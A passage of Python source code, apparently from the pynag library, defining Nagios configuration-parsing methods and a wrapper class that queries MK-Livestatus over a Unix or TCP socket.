            None if object is not found

        """
        object_key = self._get_key(object_type, user_key)
        for item in self.data['all_%s' % object_type]:
            if item.get(object_key, None) == object_name:
                return item
        return None

    def get_host(self, object_name, user_key=None):
        """ Return a host object

        Args:

            object_name: object_name field value of the object to delete from
            configuration files.

            user_key: user_key to pass to :py:meth:`get_object`

        Returns:

            The item found to match all the criterias.

        """

        return self.get_object('host', object_name, user_key=user_key)

    def get_servicegroup(self, object_name, user_key=None):
        """ Return a Servicegroup object

        Args:

            object_name: object_name field value of the object to delete from
            configuration files.

            user_key: user_key to pass to :py:meth:`get_object`

        Returns:

            The item found to match all the criterias.

        """
        return self.get_object('servicegroup', object_name, user_key=user_key)

    def get_contact(self, object_name, user_key=None):
        """ Return a Contact object

        Args:

            object_name: object_name field value of the object to delete from
            configuration files.

            user_key: user_key to pass to :py:meth:`get_object`

        Returns:

            The item found to match all the criterias.

        """
        return self.get_object('contact', object_name, user_key=user_key)

    def get_contactgroup(self, object_name, user_key=None):
        """ Return a Contactgroup object

        Args:

            object_name: object_name field value of the object to delete from
            configuration files.

            user_key: user_key to pass to :py:meth:`get_object`

        Returns:

            The item found to match all the criterias.

        """
        return self.get_object('contactgroup', object_name, user_key=user_key)

    def get_timeperiod(self, object_name, user_key=None):
        """ Return a Timeperiod object

        Args:

            object_name: object_name field value of the object to delete from
            configuration files.

            user_key: user_key to pass to :py:meth:`get_object`

        Returns:

            The item found to match all the criterias.

        """
        return self.get_object('timeperiod', object_name, user_key=user_key)

    def get_command(self, object_name, user_key=None):
        """ Return a Command object

        Args:

            object_name: object_name field value of the object to delete from
            configuration files.

            user_key: user_key to pass to :py:meth:`get_object`

        Returns:

            The item found to match all the criterias.

        """
        return self.get_object('command', object_name, user_key=user_key)

    def get_hostgroup(self, object_name, user_key=None):
        """ Return a hostgroup object

        Args:

            object_name: object_name field value of the object to delete from
            configuration files.

            user_key: user_key to pass to :py:meth:`get_object`

        Returns:

            The item found to match all the criterias.

        """
        return self.get_object('hostgroup', object_name, user_key=user_key)

    def get_servicedependency(self, object_name, user_key=None):
        """ Return a servicedependency object

        Args:

            object_name: object_name field value of the object to delete from
            configuration files.

            user_key: user_key to pass to :py:meth:`get_object`

        Returns:

            The item found to match all the criterias.

        """
        return self.get_object('servicedependency', object_name, user_key=user_key)

    def get_hostdependency(self, object_name, user_key=None):
        """ Return a hostdependency object

        Args:

            object_name: object_name field value of the object to delete from
            configuration files.

            user_key: user_key to pass to :py:meth:`get_object`

        Returns:

            The item found to match all the criterias.

        """
        return self.get_object('hostdependency', object_name, user_key=user_key)

    def get_service(self, target_host, service_description):
        """ Return a service object

        Args:

            target_host: host_name field of the service to be returned. This is
            the host to which is attached the service.

            service_description: service_description field of the service to be
            returned.

        Returns:

            The item found to match all the criterias.

        """
        for item in self.data['all_service']:
            if item.get('service_description') == service_description and item.get('host_name') == target_host:
                return item
        return None

    def _append_use(self, source_item, name):
        """ Append attributes to source_item that are inherited via 'use' attribute'

        Args:

            source_item: item (dict) to apply the inheritance upon

            name: obsolete (discovered automatically via source_item['use'].
            Here for compatibility.

        Returns:

            Source Item with appended attributes.

        Raises:

            :py:class:`ParserError` on recursion errors

        """
        # Remove the 'use' key
        if "use" in source_item:
            del source_item['use']

        for possible_item in self.pre_object_list:
            if "name" in possible_item:
                # Start appending to the item
                for k, v in possible_item.iteritems():

                    try:
                        if k == 'use':
                            source_item = self._append_use(source_item, v)
                    except Exception:
                        raise ParserError("Recursion error on %s %s" % (source_item, v))

                    # Only add the item if it doesn't already exist
                    if not k in source_item:
                        source_item[k] = v
        return source_item

    def _post_parse(self):
        """ Creates a few optimization tweaks and easy access lists in self.data

        Creates :py:attr:`config.item_apply_cache` and fills the all_object
        item lists in self.data.

        """
        self.item_list = None
        self.item_apply_cache = {}  # This is performance tweak used by _apply_template
        for raw_item in self.pre_object_list:
            # Performance tweak, make sure hashmap exists for this object_type
            object_type = raw_item['meta']['object_type']
            if not object_type in self.item_apply_cache:
                self.item_apply_cache[object_type] = {}
                # Tweak ends
            if "use" in raw_item:
                raw_item = self._apply_template(raw_item)
            self.post_object_list.append(raw_item)
            # Add the items to the class lists.
        for list_item in self.post_object_list:
            type_list_name = "all_%s" % list_item['meta']['object_type']
            if not type_list_name in self.data:
                self.data[type_list_name] = []

            self.data[type_list_name].append(list_item)

    def commit(self):
        """ Write any changes that have been made to it's appropriate file """
        # Loops through ALL items
        for k in self.data.keys():
            for item in self[k]:

                # If the object needs committing, commit it!
                if item['meta']['needs_commit']:
                    # Create file contents as an empty string
                    file_contents = ""

                    # find any other items that may share this config file
                    extra_items = self._get_items_in_file(item['meta']['filename'])
                    if len(extra_items) > 0:
                        for commit_item in extra_items:
                            # Ignore files that are already set to be deleted:w
                            if commit_item['meta']['delete_me']:
                                continue
                                # Make sure we aren't adding this thing twice
                            if item != commit_item:
                                file_contents += self.print_conf(commit_item)

                    # This is the actual item that needs commiting
                    if not item['meta']['delete_me']:
                        file_contents += self.print_conf(item)

                    # Write the file
                    filename = item['meta']['filename']
                    self.write(filename, file_contents)

                    # Recreate the item entry without the commit flag
                    self.data[k].remove(item)
                    item['meta']['needs_commit'] = None
                    self.data[k].append(item)

    def flag_all_commit(self):
        """ Flag every item in the configuration to be committed
        This should probably only be used for debugging purposes
        """
        for object_type in self.data.keys():
            for item in self.data[object_type]:
                item['meta']['needs_commit'] = True

    def print_conf(self, item):
        """ Return a string that can be used in a configuration file

        Args:

            item: Item to be dumped as a string.

        Returns:

            String representation of item.
        """
        output = ""
        # Header, to go on all files
        output += "# Configuration file %s\n" % item['meta']['filename']
        output += "# Edited by PyNag on %s\n" % time.ctime()

        # Some hostgroup information
        if "hostgroup_list" in item['meta']:
            output += "# Hostgroups: %s\n" % ",".join(item['meta']['hostgroup_list'])

        # Some hostgroup information
        if "service_list" in item['meta']:
            output += "# Services: %s\n" % ",".join(item['meta']['service_list'])

        # Some hostgroup information
        if "service_members" in item['meta']:
            output += "# Service Members: %s\n" % ",".join(item['meta']['service_members'])

        if len(item['meta']['template_fields']) != 0:
            output += "# Values from templates:\n"
        for k in item['meta']['template_fields']:
            output += "#\t %-30s %-30s\n" % (k, item[k])
        output += "\n"
        output += "define %s {\n" % item['meta']['object_type']
        for k, v in item.iteritems():
            if v is None:
                # Skip entries with No value
                continue
            if k != 'meta':
                if k not in item['meta']['template_fields']:
                    output += "\t %-30s %-30s\n" % (k, v)

        output += "}\n\n"
        return output

    def _load_static_file(self, filename=None):
        """ Load a general config file (like nagios.cfg) that has key=value config file format. Ignore comments

        Arguments:

            filename: name of file to parse, if none nagios.cfg will be used

        Returns:

            a [ (key,value), (key,value) ] list
        """
        result = []
        if not filename:
            filename = self.cfg_file
        for line in self.open(filename).readlines():
            # Strip out new line characters
            line = line.strip()

            # Skip blank lines
            if line == "":
                continue

            # Skip comments
            if line[0] == "#" or line[0] == ';':
                continue
            tmp = line.split("=", 1)
            if len(tmp) < 2:
                continue
            key, value = tmp
            key = key.strip()
            value = value.strip()
            result.append((key, value))
        return result

    def _edit_static_file(self, attribute, new_value, filename=None, old_value=None, append=False):
        """ Modify a general config file (like nagios.cfg) that has a key=value config file format.

        Arguments:

            filename: Name of config file that will be edited (i.e. nagios.cfg)

            attribute: name of attribute to edit (i.e. check_external_commands)

            new_value: new value for the said attribute (i.e. "1"). None deletes
            the line.

            old_value: Useful if multiple attributes exist (i.e. cfg_dir) and
            you want to replace a specific one.

            append: If true, do not overwrite current setting. Instead append
            this at the end. Use this with settings that are repeated like
            cfg_file.

        Examples::

            _edit_static_file(filename='/etc/nagios/nagios.cfg', attribute='check_external_commands', new_value='1')
            _edit_static_file(filename='/etc/nagios/nagios.cfg', attribute='cfg_dir', new_value='/etc/nagios/okconfig', append=True)
        """
        if filename is None:
            filename = self.cfg_file
        # For some specific attributes, append should be implied
        if attribute in ('cfg_file', 'cfg_dir', 'broker_module'):
            append = True

        # If/when we make a change, new_line is what will be written
        new_line = '%s=%s\n' % (attribute, new_value)

        # new_value=None means line should be removed
        if new_value is None:
            new_line = ''

        write_buffer = self.open(filename).readlines()
        is_dirty = False  # dirty if we make any changes
        for i, line in enumerate(write_buffer):
            # Strip out new line characters
            line = line.strip()

            # Skip blank lines
            if line == "":
                continue

            # Skip comments
            if line[0] == "#" or line[0] == ';':
                continue
            key, value = line.split("=", 1)
            key = key.strip()
            value = value.strip()

            # If key does not match, we are not interested in this line
            if key != attribute:
                continue

            # If old_value was specified, and it matches, dont have to look any further
            elif value == old_value:
                write_buffer[i] = new_line
                is_dirty = True
                break
            # if current value is the same as new_value, no need to make changes
            elif value == new_value:
                return False
            # Special so cfg_dir matches despite double-slashes, etc
            elif attribute == 'cfg_dir' and new_value and os.path.normpath(value) == os.path.normpath(new_value):
                return False
            # We are not appending, and no old value was specified:
            elif append is False and not old_value:
                write_buffer[i] = new_line
                is_dirty = True
                break
        if is_dirty is False and new_value is not None:
            # If we get here, it means we read the whole file,
            # and we have not yet made any changes, So we assume
            # We should append to the file
            write_buffer.append(new_line)
            is_dirty = True
            # When we get down here, it is time to write changes to file
        if is_dirty is True:
            str_buffer = ''.join(write_buffer)
            self.write(filename, str_buffer)
            return True
        else:
            return False

    def needs_reload(self):
        """  Checks if the Nagios service needs a reload.

        Returns:

            True if Nagios service needs reload of cfg files

            False if reload not needed or Nagios is not running
        """
        if not self.maincfg_values:
            self.reset()
            self.parse_maincfg()
        new_timestamps = self.get_timestamps()
        object_cache_file = self.get_cfg_value('object_cache_file')

        if self._get_pid() is None:
            return False
        if not object_cache_file:
            return True
        if not self.isfile(object_cache_file):
            return True
        object_cache_timestamp = new_timestamps.get(object_cache_file, 0)
        # Reload not needed if no object_cache file
        if object_cache_file is None:
            return False
        for k, v in new_timestamps.items():
            if not v or int(v) > object_cache_timestamp:
                return True
        return False

    def needs_reparse(self):
        """ Checks if the Nagios configuration needs to be reparsed.

        Returns:

            True if any Nagios configuration file has changed since last parse()

        """
        # If Parse has never been run:
        if self.data == {}:
            return True
        # If previous save operation has forced a reparse
        if self._is_dirty is True:
            return True

        # If we get here, we check the timestamps of the configs
        new_timestamps = self.get_timestamps()
        if len(new_timestamps) != len(self.timestamps):
            return True
        for k, v in new_timestamps.items():
            if self.timestamps.get(k, None) != v:
                return True
        return False

    @pynag.Utils.synchronized(pynag.Utils.rlock)
    def parse_maincfg(self):
        """ Parses your main configuration (nagios.cfg) and stores it as key/value pairs in self.maincfg_values

        This function is mainly used by config.parse() which also parses your
        whole configuration set.

        Raises:

            py:class:`ConfigFileNotFound`

        """
        # If nagios.cfg is not set, lets do some minor autodiscover.
        if self.cfg_file is None:
            raise ConfigFileNotFound('Could not find nagios.cfg')

        self.maincfg_values = self._load_static_file(self.cfg_file)

    @pynag.Utils.synchronized(pynag.Utils.rlock)
    def parse(self):
        """ Parse all objects in your nagios configuration

        This functions starts by loading up your nagios.cfg ( parse_maincfg() )
        then moving on to your object configuration files (as defined via
        cfg_file and cfg_dir) and and your resource_file as well.

        Returns:

          None

        Raises:

          :py:class:`IOError` if unable to read any file due to permission
          problems
        """

        # reset
        self.reset()

        self.parse_maincfg()

        self.cfg_files = self.get_cfg_files()

        # When parsing config, we will softly fail if permission denied
        # comes on resource files. If later someone tries to get them via
        # get_resource, we will fail hard
        try:
            self._resource_values = self.get_resources()
        except IOError:
            t, e = sys.exc_info()[:2]
            self.errors.append(str(e))

        self.timestamps = self.get_timestamps()

        # This loads everything into
        for cfg_file in self.cfg_files:
            self._load_file(cfg_file)

        self._post_parse()

        self._is_dirty = False

    def get_resource(self, resource_name):
        """ Get a single resource value which can be located in any resource.cfg file

         Arguments:

            resource_name: Name as it appears in resource file (i.e. $USER1$)

        Returns:

            String value of the resource value.

        Raises:

            :py:class:`KeyError` if resource is not found

            :py:class:`ParserError` if resource is not found and you do not have
            permissions

        """
        resources = self.get_resources()
        for k, v in resources:
            if k == resource_name:
                return v

    def get_timestamps(self):
        """ Returns hash map of all nagios related files and their timestamps"""
        files = {}
        files[self.cfg_file] = None
        for k, v in self.maincfg_values:
            if k in ('resource_file', 'lock_file', 'object_cache_file'):
                files[v] = None
        for i in self.get_cfg_files():
            files[i] = None
        # Now lets lets get timestamp of every file
        for k, v in files.items():
            if not self.isfile(k):
                continue
            files[k] = self.stat(k).st_mtime
        return files

    def isfile(self, *args, **kwargs):
        """ Wrapper around os.path.isfile """
        return os.path.isfile(*args, **kwargs)

    def isdir(self, *args, **kwargs):
        """ Wrapper around os.path.isdir """
        return os.path.isdir(*args, **kwargs)

    def islink(self, *args, **kwargs):
        """ Wrapper around os.path.islink """
        return os.path.islink(*args, **kwargs)

    def readlink(selfself, *args, **kwargs):
        """ Wrapper around os.readlink """
        return os.readlink(*args, **kwargs)

    def stat(self, *args, **kwargs):
        """ Wrapper around os.stat """
        return os.stat(*args, **kwargs)

    def remove(self, *args, **kwargs):
        """ Wrapper around os.remove """
        return os.remove(*args, **kwargs)

    def access(self, *args, **kwargs):
        """ Wrapper around os.access """
        return os.access(*args, **kwargs)

    def listdir(self, *args, **kwargs):
        """ Wrapper around os.listdir """

        return os.listdir(*args, **kwargs)

    def exists(self, *args, **kwargs):
        """ Wrapper around os.path.exists """
        return os.path.exists(*args, **kwargs)

    def get_resources(self):
        """Returns a list of every private resources from nagios.cfg"""
        resources = []
        for config_object, config_value in self.maincfg_values:
            if config_object == 'resource_file' and self.isfile(config_value):
                resources += self._load_static_file(config_value)
        return resources

    def extended_parse(self):
        """ This parse is used after the initial parse() command is run.

        It is only needed if you want extended meta information about hosts or other objects
        """
        # Do the initial parsing
        self.parse()

        # First, cycle through the hosts, and append hostgroup information
        index = 0
        for host in self.data['all_host']:
            if host.get("register", None) == "0":
                continue
            if not "host_name" in host:
                continue
            if not "hostgroup_list" in self.data['all_host'][index]['meta']:
                self.data['all_host'][index]['meta']['hostgroup_list'] = []

            # Append any hostgroups that are directly listed in the host definition
            if "hostgroups" in host:
                for hostgroup_name in self._get_list(host, 'hostgroups'):
                    if not "hostgroup_list" in self.data['all_host'][index]['meta']:
                        self.data['all_host'][index]['meta']['hostgroup_list'] = []
                    if hostgroup_name not in self.data['all_host'][index]['meta']['hostgroup_list']:
                        self.data['all_host'][index]['meta']['hostgroup_list'].append(hostgroup_name)

            # Append any services which reference this host
            service_list = []
            for service in self.data['all_service']:
                if service.get("register", None) == "0":
                    continue
                if not "service_description" in service:
                    continue
                if host['host_name'] in self._get_active_hosts(service):
                    service_list.append(service['service_description'])
            self.data['all_host'][index]['meta']['service_list'] = service_list

            # Increment count
            index += 1

        # Loop through all hostgroups, appending them to their respective hosts
        for hostgroup in self.data['all_hostgroup']:
            for member in self._get_list(hostgroup, 'members'):
                index = 0
                for host in self.data['all_host']:
                    if not "host_name" in host:
                        continue

                    # Skip members that do not match
                    if host['host_name'] == member:

                        # Create the meta var if it doesn' exist
                        if not "hostgroup_list" in self.data['all_host'][index]['meta']:
                            self.data['all_host'][index]['meta']['hostgroup_list'] = []

                        if hostgroup['hostgroup_name'] not in self.data['all_host'][index]['meta']['hostgroup_list']:
                            self.data['all_host'][index]['meta']['hostgroup_list'].append(hostgroup['hostgroup_name'])

                    # Increment count
                    index += 1

        # Expand service membership
        index = 0
        for service in self.data['all_service']:
            # Find a list of hosts to negate from the final list
            self.data['all_service'][index]['meta']['service_members'] = self._get_active_hosts(service)

            # Increment count
            index += 1

    def _get_active_hosts(self, item):
        """ Given an object, return a list of active hosts.

        This will exclude hosts that are negated with a "!"

        Args:

            item: Item to obtain active hosts from.

        Returns:

            List of all the active hosts for `item`
        """
        # First, generate the negation list
        negate_hosts = []

        # Hostgroups
        if "hostgroup_name" in item:
            for hostgroup_name in self._get_list(item, 'hostgroup_name'):
                if hostgroup_name[0] == "!":
                    hostgroup_obj = self.get_hostgroup(hostgroup_name[1:])
                    negate_hosts.extend(self._get_list(hostgroup_obj, 'members'))

        # Host Names
        if "host_name" in item:
            for host_name in self._get_list(item, 'host_name'):
                if host_name[0] == "!":
                    negate_hosts.append(host_name[1:])

        # Now get hosts that are actually listed
        active_hosts = []

        # Hostgroups
        if "hostgroup_name" in item:
            for hostgroup_name in self._get_list(item, 'hostgroup_name'):
                if hostgroup_name[0] != "!":
                    active_hosts.extend(self._get_list(self.get_hostgroup(hostgroup_name), 'members'))

        # Host Names
        if "host_name" in item:
            for host_name in self._get_list(item, 'host_name'):
                if host_name[0] != "!":
                    active_hosts.append(host_name)

        # Combine the lists
        return_hosts = []
        for active_host in active_hosts:
            if active_host not in negate_hosts:
                return_hosts.append(active_host)

        return return_hosts

    def get_cfg_dirs(self):
        """ Parses the main config file for configuration directories

        Returns:

            List of all cfg directories used in this configuration

        Example::

            print(get_cfg_dirs())
            ['/etc/nagios/hosts','/etc/nagios/objects',...]

        """
        cfg_dirs = []
        for config_object, config_value in self.maincfg_values:
            if config_object == "cfg_dir":
                cfg_dirs.append(config_value)
        return cfg_dirs

    def get_cfg_files(self):
        """ Return a list of all cfg files used in this configuration

        Filenames are normalised so that if nagios.cfg specifies relative
        filenames we will convert it to fully qualified filename before returning.

        Returns:

            List of all configurations files used in the configuration.

        Example:

            print(get_cfg_files())
            ['/etc/nagios/hosts/host1.cfg','/etc/nagios/hosts/host2.cfg',...]

        """
        cfg_files = []
        for config_object, config_value in self.maincfg_values:

            # Add cfg_file objects to cfg file list
            if config_object == "cfg_file":
                config_value = self.abspath(config_value)
                if self.isfile(config_value):
                    cfg_files.append(config_value)

            # Parse all files in a cfg directory
            if config_object == "cfg_dir":
                config_value = self.abspath(config_value)
                directories = []
                raw_file_list = []
                directories.append(config_value)
                # Walk through every subdirectory and add to our list
                while directories:
                    current_directory = directories.pop(0)
                    # Nagios doesnt care if cfg_dir exists or not, so why should we ?
                    if not self.isdir(current_directory):
                        continue
                    for item in self.listdir(current_directory):
                        # Append full path to file
                        item = "%s" % (os.path.join(current_directory, item.strip()))
                        if self.islink(item):
                            item = os.readlink(item)
                        if self.isdir(item):
                            directories.append(item)
                        if raw_file_list.count(item) < 1:
                            raw_file_list.append(item)
                for raw_file in raw_file_list:
                    if raw_file.endswith('.cfg'):
                        if self.exists(raw_file) and not self.isdir(raw_file):
                            # Nagios doesnt care if cfg_file exists or not, so we will not throws errors
                            cfg_files.append(raw_file)

        return cfg_files

    def abspath(self, path):
        """ Return the absolute path of a given relative path.

        The current working directory is assumed to be the dirname of nagios.cfg

        Args:

            path: relative path to be transformed into absolute path. (string)

        Returns:

            Absolute path of given relative path.

        Example:

            >>> c = config(cfg_file="/etc/nagios/nagios.cfg")
            >>> c.abspath('nagios.cfg')
            '/etc/nagios/nagios.cfg'
            >>> c.abspath('/etc/nagios/nagios.cfg')
            '/etc/nagios/nagios.cfg'

        """
        if not isinstance(path, str):
            return ValueError("Path must be a string got %s instead" % type(path))
        if path.startswith('/'):
            return path
        nagiosdir = os.path.dirname(self.cfg_file)
        normpath = os.path.abspath(os.path.join(nagiosdir, path))
        return normpath

    def get_cfg_value(self, key):
        """ Returns one specific value from your nagios.cfg file,
        None if value is not found.

        Arguments:

            key: what attribute to fetch from nagios.cfg (example: "command_file" )

        Returns:

            String of the first value found for

        Example:

            >>> c = Config() # doctest: +SKIP
            >>> log_file = c.get_cfg_value('log_file') # doctest: +SKIP
            # Should return something like "/var/log/nagios/nagios.log"
        """
        if not self.maincfg_values:
            self.parse_maincfg()
        for k, v in self.maincfg_values:
            if k == key:
                return v
        return None

    def get_object_types(self):
        """ Returns a list of all discovered object types """
        return map(lambda x: re.sub("all_", "", x), self.data.keys())

    def cleanup(self):
        """ Remove configuration files that have no configuration items """
        for filename in self.cfg_files:
            if not self.parse_file(filename):  # parse_file returns empty list on empty files
                self.remove(filename)
                # If nagios.cfg specifies this file directly via cfg_file directive then...
                for k, v in self.maincfg_values:
                    if k == 'cfg_file' and v == filename:
                        self._edit_static_file(k, old_value=v, new_value=None)

    def __setitem__(self, key, item):
        self.data[key] = item

    def __getitem__(self, key):
        return self.data[key]


class Livestatus(object):

    """ Wrapper around MK-Livestatus

    Example usage::

        s = Livestatus()
        for hostgroup s.get_hostgroups():
            print(hostgroup['name'], hostgroup['num_hosts'])
    """

    def __init__(self, livestatus_socket_path=None, nagios_cfg_file=None, authuser=None):
        """ Initilize a new instance of Livestatus

        Args:

          livestatus_socket_path: Path to livestatus socket (if none specified,
          use one specified in nagios.cfg)

          nagios_cfg_file: Path to your nagios.cfg. If None then try to
          auto-detect

          authuser: If specified. Every data pulled is with the access rights
          of that contact.

        """
        self.nagios_cfg_file = nagios_cfg_file
        self.error = None
        if not livestatus_socket_path:
            c = config(cfg_file=nagios_cfg_file)
            c.parse_maincfg()
            self.nagios_cfg_file = c.cfg_file
            # Look for a broker_module line in the main config and parse its arguments
            # One of the arguments is path to the file socket created
            for k, v in c.maincfg_values:
                if k == 'broker_module' and "livestatus.o" in v:
                    for arg in v.split()[1:]:
                        if arg.startswith('/') or '=' not in arg:
                            livestatus_socket_path = arg
                            break
                    else:
                        # If we get here, then we could not locate a broker_module argument
                        # that looked like a filename
                        msg = "No Livestatus socket defined. Make sure livestatus broker module is loaded."
                        raise ParserError(msg)
        self.livestatus_socket_path = livestatus_socket_path
        self.authuser = authuser

    def test(self, raise_error=True):
        """ Test if connection to livestatus socket is working

        Args:

            raise_error: If set to True, raise exception if test fails,otherwise return False

        Raises:

            ParserError if raise_error == True and connection fails

        Returns:

            True -- Connection is OK
            False -- there are problems and raise_error==False

        """
        try:
            self.query("GET hosts")
        except Exception:
            t, e = sys.exc_info()[:2]
            self.error = e
            if raise_error:
                raise ParserError("got '%s' when testing livestatus socket. error was: '%s'" % (type(e), e))
            else:
                return False
        return True

    def _get_socket(self):
        """ Returns a socket.socket() instance to communicate with livestatus

        Socket might be either unix filesocket or a tcp socket depenging in
        the content of :py:attr:`livestatus_socket_path`

        Returns:

            Socket to livestatus instance (socket.socket)

        Raises:

            :py:class:`LivestatusNotConfiguredException` on failed connection.

            :py:class:`ParserError` If could not parse configured TCP address
            correctly.

        """
        if not self.livestatus_socket_path:
            msg = "We could not find path to MK livestatus socket file. Make sure MK livestatus is installed and configured"
            raise LivestatusNotConfiguredException(msg)
        try:
            # If livestatus_socket_path contains a colon, then we assume that it is tcp socket instead of a local filesocket
            if self.livestatus_socket_path.find(':') > 0:
                address, tcp_port = self.livestatus_socket_path.split(':', 1)
                if not tcp_port.isdigit():
                    msg = 'Could not parse host:port "%s". %s  does not look like a valid port is not a valid tcp port.'
                    raise ParserError(msg % (self.livestatus_socket_path, tcp_port))
                tcp_port = int(tcp_port)
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.connect((address, tcp_port))
            else:
                s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
                s.connect(self.livestatus_socket_path)
            return s
        except IOError:
            t, e = sys.exc_info()[:2]
            msg = "%s while connecting to '%s'. Make sure nagios is running and mk_livestatus loaded."
            raise ParserError(msg % (e, self.livestatus_socket_path))

    def query(self, query, *args, **kwargs):
        """ Performs LQL queries the livestatus socket

        Queries are corrected and convienient default data are added to the
        query before sending it to the socket.

        Args:

            query: Query to be passed to the livestatus socket (string)

            args, kwargs: Additionnal parameters that will be sent to
            :py:meth:`pynag.Utils.grep_to_livestatus`. The result will be
            appended to the query.

        Returns:

            Answer from livestatus. It will be in python format unless specified
            otherwise.

        Raises:

            :py:class:`ParserError` if problems connecting to livestatus.

        """

        # columns parameter is here for backwards compatibility only
        kwargs.pop('columns', None)

        # We break query up into a list, of commands, then before sending command to the socket
        # We will write it one line per item in the array
        query = query.split('\n')
        query += pynag.Utils.grep_to_livestatus(*args, **kwargs)

        # If no response header was specified, we add fixed16
        response_header = None
        if not filter(lambda x: x.startswith('ResponseHeader:'), query):
            query.append("ResponseHeader: fixed16")
            response_header = "fixed16"

        # If no specific outputformat is requested, we will return in python format
        python_format = False
        if not filter(lambda x: x.startswith('OutputFormat:'), query):
            query.append("OutputFormat: python")
            python_format = True

        # There is a bug in livestatus where if requesting Stats, then no column headers are sent from livestatus
        # In later version, the headers are sent, but the output is corrupted.
        #
        # We maintain consistency by clinging on to the old bug, and if there are Stats in the output
        # we will not ask for column headers
        doing_stats = len(filter(lambda x: x.startswith('Stats:'), query)) > 0
        if not filter(lambda x: x.startswith('Stats:'), query) and not filter(
                lambda x: x.startswith('ColumnHeaders: on'), query):
            query.append("ColumnHeaders: on")

        # Check if we need to add authuser to the query
        if not filter(lambda x: x.startswith('AuthUser:'), query) and self.authuser not in (None, ''):
            query.append("AuthUser: %s" % self.authuser)

        # When we reach here, we are done adding options to the query, so we convert to the string that will
        # be sent to the livestatus socket
        query = '\n'.join(query) + '\n'
        self.last_query = query

        #
        # Lets create a socket and see if we can write to it
        #
        s = self._get_socket()
        try:
            s.send(query)
        except IOError:
            msg = "Could not write to socket '%s'. Make sure you have the right permissions"
            raise ParserError(msg % self.livestatus_socket_path)
        s.shutdown(socket.SHUT_WR)
        tmp = s.makefile()

        # Read the response header from livestatus
        if response_header == "fixed16":
            response_data = tmp.readline()
            if len(response_data) == 0:
                return []
            return_code = response_data.split()[0]
            if not return_code.startswith('2'):
                error_message = tmp.readline().strip()
                raise ParserError("Error '%s' from livestatus: %s" % (return_code, error_message))

        answer = tmp.read()
        # We are done with the livestatus socket. lets close it
        s.close()

        if answer == '':
            return []

        # If something other than python format was requested, we return the answer as is
        if python_format is False:
            return answer

        # If we reach down here, it means we are supposed to parse the output before returning it
        try:
            answer = eval(answer)
        except Exception:
            raise ParserError("Error, could not parse response from livestatus.\n%s" % answer)

        # Workaround for livestatus bug, where column headers are not provided even if we asked for them
        if doing_stats is True and len(answer) == 1:
            return answer[0]

        columns = answer.pop(0)

        # Lets throw everything into a hashmap before we return
        result = []
        for line in answer:
            tmp = {}
            for i, column in enumerate(line):
                column_name = columns[i]
                tmp[column_name] = column
            result.append(tmp)
        return result

    def get(self, table, *args, **kwargs):
        """ Same as self.query('GET %s' % (table,))

        Extra arguments will be appended to the query.

        Args:

            table: Table from which the data will be retrieved

            args, kwargs: These will be appendend to the end of the query to
            perform additionnal instructions.

        Example::

            get('contacts', 'Columns: name alias')

        Returns:

            Answer from livestatus in python format.

        """
        return self.query('GET %s' % (table,), *args, **kwargs)

    def get_host(self, host_name):
        """ Performs a GET query for a particular host

        This performs::

            '''GET hosts
            Filter: host_name = %s''' % host_name

        Args:

            host_name: name of the host to obtain livestatus data from

        Returns:

            Answer from livestatus in python format.

        """
        return self.query('GET hosts', 'Filter: host_name = %s' % host_name)[0]

    def get_service(self, host_name, service_description):
        """ Performs a GET query for a particular service

        This performs::

            '''GET services
            Filter: host_name = %s
            Filter: service_description = %s''' % (host_name, service_description)

        Args:

            host_name: name of the host the target service is attached to.

            service_description: Description of the service to obtain livestatus
            data from.

        Returns:

            Answer from livestatus in python format.

        """
        return self.query('GET services', 'Filter: host_name = %s' % host_name,
                          'Filter: description = %s' % service_description)[0]

    def get_hosts(self, *args, **kwargs):
        """ Performs a GET query for all hosts

        This performs::

            '''GET hosts %s %s''' % (*args, **kwargs)

        Args:

            args, kwargs: These will be appendend to the end of the query to
            perform additionnal instructions.

        Returns:

            Answer from livestatus in python format.

        """
        return self.query('GET hosts', *args, **kwargs)

    def get_services(self, *args, **kwargs):
        """ Performs a GET query for all services

        This performs::

            '''GET services
            %s %s''' % (*args, **kwargs)

        Args:

            args, kwargs: These will be appendend to the end of the query to
            perform additionnal instructions.

        Returns:

            Answer from livestatus in python format.

        """
        return self.query('GET services', *args, **kwargs)

    def get_hostgroups(self, *args, **kwargs):
        """ Performs a GET query for all hostgroups

        This performs::

            '''GET hostgroups
            %s %s''' % (*args, **kwargs)

        Args:

            args, kwargs: These will be appendend to the end of the query to
            perform additionnal instructions.

        Returns:

            Answer from livestatus in python format.

        """
        return self.query('GET hostgroups', *args, **kwargs)

    def get_servicegroups(self, *args, **kwargs):
        """ Performs a GET query for all servicegroups

        This performs::

            '''GET servicegroups
            %s %s''' % (*args, **kwargs)

        Args:

            args, kwargs: These will be appendend to the end of the query to
            perform additionnal instructions.

        Returns:

            Answer from livestatus in python format.

        """
        return self.query('GET servicegroups', *args, **kwargs)

    def get_contactgroups(self, *args, **kwargs):
        """ Performs a GET query for all contactgroups

        This performs::

            '''GET contactgroups
            %s %s''' % (*args, **kwargs)

        Args:

            args, kwargs: These will be appendend to the end of the query to
            perform additionnal instructions.

        Returns:

            Answer from livestatus in python format.

        """
        return self.query('GET contactgroups', *args, **kwargs)

    def get_contacts(self, *args, **kwargs):
        """ Performs a GET query for all contacts

        This performs::

            '''GET contacts
            %s %s''' % (*args, **kwargs)

        Args:

            args, kwargs: These will be appendend to the end of the query to
            perform additionnal instructions.

        Returns:

            Answer from livestatus in python format.

        """
        return self.query('GET contacts', *args, **kwargs)

    def get_contact(self, contact_name):
        """ Performs a GET query for a particular contact

        This performs::

            '''GET contacts
            Filter: contact_name = %s''' % contact_name

        Args:

            contact_name: name of the contact to obtain livestatus data from

        Returns:

            Answer from livestatus in python format.

        """
        return self.query('GET contacts', 'Filter: contact_name = %s' % contact_name)[0]

    def get_servicegroup(self, name):
        """ Performs a GET query for a particular servicegroup

        This performs::

            '''GET servicegroups
            Filter: servicegroup_name = %s''' % servicegroup_name

        Args:

            servicegroup_name: name of the servicegroup to obtain livestatus data from

        Returns:

            Answer from livestatus in python format.

        """
        return self.query('GET servicegroups', 'Filter: name = %s' % name)[0]

    def get_hostgroup(self, name):
        """ Performs a GET query for a particular hostgroup

        This performs::

            '''GET hostgroups
            Filter: hostgroup_name = %s''' % hostgroup_name

        Args:

            hostgroup_name: name of the hostgroup to obtain livestatus data from

        Returns:

            Answer from livestatus in python format.

        """
        return self.query('GET hostgroups', 'Filter: name = %s' % name)[0]

    def get_contactgroup(self, name):
